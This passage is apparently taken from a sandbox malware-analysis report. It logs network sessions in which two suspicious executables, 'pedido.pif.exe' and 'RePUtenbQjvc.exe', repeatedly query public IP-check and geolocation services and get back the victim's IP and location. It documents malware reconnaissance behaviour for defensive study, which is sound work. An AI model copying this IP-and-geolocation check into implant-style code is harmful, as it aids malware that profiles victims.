Oct 31, 2024 10:37:45.667161942 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:45 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5666488b52b138767704410484538121 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	55435	193.122.130.0	80	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:46.647955894 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:47.319080114 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:47 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 005d36e022ec7f19ada6b3733346ed11 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49711	188.114.96.3	443	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:30 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:37:30 UTC	1218	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:30 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4325 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxb04XlV3f4HldEDjpeHoo1tN%2FB0kZBrHWM2fi19SEacJJUEoQ4kScQtXrovUX4rx1ddwvkQS2ziMXr%2Bd6cvaT9idGuPPSb7Ni2UrIyK%2BbDsKsI5cGK4tFgcU24Oet1j8bx5RFF%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aab8093fe9c6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1854&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1562028&cwnd=245&unsent_bytes=0&cid=6d3328065148d01d&ts=254&x=0"
2024-10-31 09:37:30 UTC	151	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
2024-10-31 09:37:30 UTC	208	IN	Data Raw: 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	188.114.96.3	443	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:31 UTC	63	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-31 09:37:31 UTC	1211	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:31 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4326 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tMrt5zZo2JRP7HGmtbBmpl4IxKHcu6XItgGTV2FKQH7YNYh4JU0Og7HVNYUX4VkZM%2FC3p3oB6JsGVQWu6jytmqPwixeQURxEdYOiiMwLmELX0gXke9mFZD1zOWf1QHYXj3tXycdo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aabe6ade4647-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1818&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1585980&cwnd=93&unsent_bytes=0&cid=9eeefb046e133428&ts=142&x=0"
2024-10-31 09:37:31 UTC	158	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</
2024-10-31 09:37:31 UTC	201	IN	Data Raw: 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49714	188.114.96.3	443	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:33 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:37:33 UTC	1224	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:33 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4328 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0dIdhoTzqH1OsXA6aEvogl3spTUBsm6uviORa3bdyxD160q%2Fcgo%2FJBw%2BLb692%2B%2BWB5EfWm5gNpMeFIDGzj%2FKPan2Rnq3hykzAmr55r8KUOuikTeQexR0p%2FTy5AHJ0xZ0HyNn43M6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aac759976bb9-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1072&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2691449&cwnd=251&unsent_bytes=0&cid=5730418cdbc077ba&ts=144&x=0"
2024-10-31 09:37:33 UTC	145	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Regio
2024-10-31 09:37:33 UTC	214	IN	Data Raw: 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: nName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49716	188.114.96.3	443	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:34 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:37:34 UTC	1212	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:34 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4329 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8IoCpoJTlr498yibwIFK3lRcDprcsFUSbcaL7SJnEsiySHCNNzPzjSGeKHhLRCWixJFkxvoc8MXVasJuCTFIRm1beP2zHbaJHG5SO4rM%2BfWrrvjOJtO1eZndZ2E174QiciwkqVi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aad05b2de857-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2551541&cwnd=243&unsent_bytes=0&cid=eb063c0655a5d573&ts=150&x=0"
2024-10-31 09:37:34 UTC	157	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas<
2024-10-31 09:37:34 UTC	202	IN	Data Raw: 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: /RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49718	188.114.96.3	443	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:36 UTC	63	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-31 09:37:36 UTC	1220	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:36 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4331 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OOhs2oDdoB1TzrdGIsqWoI8BbR88WWEYZyBy7zBGM2%2FoBt06n8VT%2BLm5xFnY9%2BoHunV3CvOUefYhKymmQxzXPVz8dbrn7olv60GmNozqJT6uiPAFC9cj2Gn%2FZYwS%2Fnk0gnhMSvON"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aad9af39e983-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2123&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1377735&cwnd=247&unsent_bytes=0&cid=ebdaa6bb8f98ea15&ts=157&x=0"
2024-10-31 09:37:36 UTC	149	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNam
2024-10-31 09:37:36 UTC	210	IN	Data Raw: 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: e>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	188.114.96.3	443	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:37 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:37:37 UTC	1216	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:37 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4332 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQG%2FxswmEiG40nNEyqHumBSPOkLYVMjH93QOCmnZeYUX9dOioC4LdSfHK0nauiQmKTV4K0QJmCAyYAv69nrm8jvu4VSW07o4BGjquQttnv%2BKejUm5Kv%2FXKH93kxsYM0wKdOy7afz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aae27b7e476d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1133&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2454237&cwnd=251&unsent_bytes=0&cid=b3a9d83858736f13&ts=196&x=0"
2024-10-31 09:37:37 UTC	153	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Te
2024-10-31 09:37:37 UTC	206	IN	Data Raw: 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: xas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49722	188.114.96.3	443	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 09:37:37 UTC	87	OUT	GET /xml/173.254.250.77 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-31 09:37:37 UTC	1220	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:37 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710 x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4332 Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOuY%2B42LEUk68AIDqbD%2FaDJHYryXGjarJzGT6o06NcVc5JeRXvTNiGw76pyXTVCWNonz1VezJYG2f4Zi4InHM%2FfS6TY3UnF6AoiMDhevwzdcIT%2FzgBt2s5VZPKHL2gF0eOV%2BhTqZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db2aae288206c3c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1216&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2362153&cwnd=250&unsent_bytes=0&cid=971135f7da0e54cc&ts=140&x=0"
